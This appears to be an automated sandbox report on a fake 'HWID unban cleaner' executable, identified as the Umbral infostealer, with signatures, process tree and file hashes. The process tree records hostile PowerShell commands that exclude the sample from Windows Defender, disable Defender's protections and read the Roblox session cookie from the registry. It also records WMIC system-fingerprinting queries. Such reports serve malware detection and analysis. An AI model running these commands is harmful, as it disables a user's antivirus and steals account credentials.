Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-03-2024 00:20

General

  • Target

    Unban Global HWID/Cleaner.exe

  • Size

    229KB

  • MD5

    00b50ac019d337a11d626cb5e48931a3

  • SHA1

    fab828f25f492a1a8f6e8f112f95daf5fb7ba209

  • SHA256

    bf5ed21104c2406217f2629ea5dac416172e4f7019817ae9fe81d5925c656936

  • SHA512

    8fab8f9fe41049a725df6bf275cf2f8e121c048f20f1608534d7118770ce096242481af1f38fb0ede9e34c8808e45bee80dfa06424a604544c10688e31610000

  • SSDEEP

    6144:lloZMCrIkd8g+EtXHkv/iD4p5NZf9rI8j667NokRg9/b8e1myi:noZZL+EP8pnZf9rI8j667NokRss

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe
    "C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Unban Global HWID\Cleaner.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3908
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3448
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1728
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4408
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:936
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:3160
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:3868
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          1⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff83c949758,0x7ff83c949768,0x7ff83c949778
            2⤵
              PID:1996
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:2
              2⤵
                PID:1392
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
                2⤵
                  PID:456
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
                  2⤵
                    PID:380
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
                    2⤵
                      PID:700
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
                      2⤵
                        PID:2620
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
                        2⤵
                          PID:2144
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4796 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
                          2⤵
                            PID:3260
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
                            2⤵
                              PID:204
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1528 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:1
                              2⤵
                                PID:1248
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3284 --field-trial-handle=1776,i,2081985251555635852,6871136038235148148,131072 /prefetch:8
                                2⤵
                                  PID:3508
                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                1⤵
                                  PID:5044

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                  Filesize

                                  371B

                                  MD5

                                  09ea69220f53456965a33a3139b1553e

                                  SHA1

                                  aa3ea9cf050393c9548e2f49192f1057b92fe0f4

                                  SHA256

                                  48eaf35c543543380c6b9008a3d88edd73a405641d6dda28180c412c50dcf07d

                                  SHA512

                                  c22d143b918c06271f96a237dabddbfd81a7823ca1da4450f6c25cd74e009333c35bf7adeede35ff5ea5765d2c0b7ae32a67341b412d4d4bf014855d1272b7a7

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  c55dff669c56d21027e3511119aa60eb

                                  SHA1

                                  d96b15a2cbd3c0c78fb7d8d8ff41ac8839114516

                                  SHA256

                                  d10af68810eddaad256ea75708f3b298a37ef8d189301da88e414882b1a3c2d8

                                  SHA512

                                  5a32d673824dd78361f7ba16567163b61989b9e92ad09f6ba1e6c34a880c1eac287c85b85d137ef92ad834c8d0beabb26d4abd0084d3c788a6d7100dc11ae55c

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  b6c02d8c903aaff6d4bc6099205e453c

                                  SHA1

                                  23cb4beedc48451fd117a51ba4570676d976bcbb

                                  SHA256

                                  fdac560424d817f99b18e1093dfd0250cd4d35ddb632ed5bdb2bad81b7896a5c

                                  SHA512

                                  d6334cc3af1796a8340f63322f708c55bdefae0f497a5a9c75ee5722ccf5fbc5d2b525053d230d0e9dfcbab18e6b96241983b1fa184759aeaed906fbadec2366

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  631f3f44a4b87b080a88d286eb3ca2e0

                                  SHA1

                                  41e9bc72dd40d7deeb6fa924542804c0802080a7

                                  SHA256

                                  fa644306550a02a64e2cc18a9ba6b834785b0ef5776cca3dad09d1cec850c065

                                  SHA512

                                  687727309b1c3ab18d0aa01470cca7cddc722841c77067751b1eca619652217f309461697dc410b82469a8663b2d824a3ce6d86659834e0c7347e8248c023562

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                  Filesize

                                  260KB

                                  MD5

                                  f78720c3d39b5c4d51c732cef6c5c740

                                  SHA1

                                  7febe71c0e6858397cbbb75714141830a5f78ae3

                                  SHA256

                                  e81691698785bd3d9685ee5aa13f6d176b46dd37e2a0f8797e3c3c5f41e0212a

                                  SHA512

                                  9b55824cc12a47ab5ea23ac3d79b0c86070aefc4c48314031cc48be5f99b4db3ca3a6fb53d25aa46493e19dd24b430887d06c8ab6eaa689a95f313f40ae32379

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                  Filesize

                                  2B

                                  MD5

                                  99914b932bd37a50b983c5e7c90ae93b

                                  SHA1

                                  bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                  SHA256

                                  44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                  SHA512

                                  27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  3KB

                                  MD5

                                  8592ba100a78835a6b94d5949e13dfc1

                                  SHA1

                                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                  SHA256

                                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                  SHA512

                                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  49104c8155e8cbb7e97a9c3edbcea34e

                                  SHA1

                                  555e1c408747c6c5e67e6fcccf30df0f91490ee8

                                  SHA256

                                  0b130daf7c046e4a67e9e035df9e34b997fe63b4663dd805705915ee6d39e60d

                                  SHA512

                                  3b67dd4e72e11575d43e513d7a3399b5b2a64376cb89faa526f0c695fd775ff1f67fdc32ba15cc7e69e154a4ede1c2611fff250b376ed6478d3c5f80ce2b9ad8

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  70d7365fb2dc00ae1b0384b7b1db8a0f

                                  SHA1

                                  0ad122f11380799fc1afd78389194beb09cd5ab4

                                  SHA256

                                  db754f4dea4a62c84c8b67130cdec13a8238d982bc3c6428eb0bd8ed3975e8b5

                                  SHA512

                                  28bd600fd83cff71e181afc6b5fc2cec231a21b32b4f58d1e38f05618f7fe9ffe671b4cf0e336e0aca45374c7f3bd41eb7a3747d38a378c9234088baae121ff5

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  4abdbb70fe6ea0f12b18b62c44dde29d

                                  SHA1

                                  8493f2d635f99ea1182fa36e4fea84c3497555d2

                                  SHA256

                                  e3cdb6201cf5c74309451d8853d93be93f449d1172960a8aeed0cb771c41366c

                                  SHA512

                                  2afe1724227ea3adc2808aa9328b7b927b35884d711b109ce82516aba21696e7a2da3bf1f94ec3684442b02b461e0f6a89c546fdeb342e8af75bae58bd678b30

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  34454010f6d39d8bba4289f30530a58e

                                  SHA1

                                  99a61de454e8316c7ba53474286b17fef3b971b9

                                  SHA256

                                  7c3078ac53e4eb057aa00a57808a0bcf50777d38c42ac0fce414d66ab4101d54

                                  SHA512

                                  3d1920041d7ad07878dc763885e345c7dcaf8f746f2e45c46d80625473eedbb779244d739a34230027259a787354bdc102afaed8c78e8b4498e0bcc16593cce2

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bigc50ik.anz.ps1

                                  Filesize

                                  1B

                                  MD5

                                  c4ca4238a0b923820dcc509a6f75849b

                                  SHA1

                                  356a192b7913b04c54574d18c28d46e6395428ab

                                  SHA256

                                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                  SHA512

                                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                • memory/936-177-0x00000190AD560000-0x00000190AD570000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/936-198-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/936-195-0x00000190AD560000-0x00000190AD570000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/936-176-0x00000190AD560000-0x00000190AD570000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/936-174-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/964-49-0x0000020DEFE00000-0x0000020DEFE10000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/964-26-0x0000020DEFE00000-0x0000020DEFE10000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/964-13-0x0000020DF0650000-0x0000020DF06C6000-memory.dmp

                                  Filesize

                                  472KB

                                • memory/964-11-0x0000020DEFE00000-0x0000020DEFE10000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/964-9-0x0000020DEFE00000-0x0000020DEFE10000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/964-7-0x0000020DF04A0000-0x0000020DF04C2000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/964-53-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/964-8-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1568-58-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1568-89-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1568-61-0x000002641A3B0000-0x000002641A3C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/1568-60-0x000002641A3B0000-0x000002641A3C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/1568-86-0x000002641A3B0000-0x000002641A3C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/1808-97-0x0000025CBE490000-0x0000025CBE4A0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/1808-98-0x0000025CBE490000-0x0000025CBE4A0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/1808-128-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1808-95-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/1808-125-0x0000025CBE490000-0x0000025CBE4A0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2772-90-0x000002C224BD0000-0x000002C224C20000-memory.dmp

                                  Filesize

                                  320KB

                                • memory/2772-62-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/2772-167-0x000002C20AC30000-0x000002C20AC3A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/2772-1-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/2772-168-0x000002C20AC60000-0x000002C20AC72000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/2772-91-0x000002C20AA70000-0x000002C20AA8E000-memory.dmp

                                  Filesize

                                  120KB

                                • memory/2772-124-0x000002C224C80000-0x000002C224C90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2772-2-0x000002C224C80000-0x000002C224C90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2772-203-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/2772-0-0x000002C20A5E0000-0x000002C20A620000-memory.dmp

                                  Filesize

                                  256KB

                                • memory/3908-162-0x000001D26BC20000-0x000001D26BC30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3908-132-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB

                                • memory/3908-161-0x000001D26BC20000-0x000001D26BC30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3908-134-0x000001D26BC20000-0x000001D26BC30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3908-135-0x000001D26BC20000-0x000001D26BC30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3908-165-0x00007FF82E900000-0x00007FF82F2EC000-memory.dmp

                                  Filesize

                                  9.9MB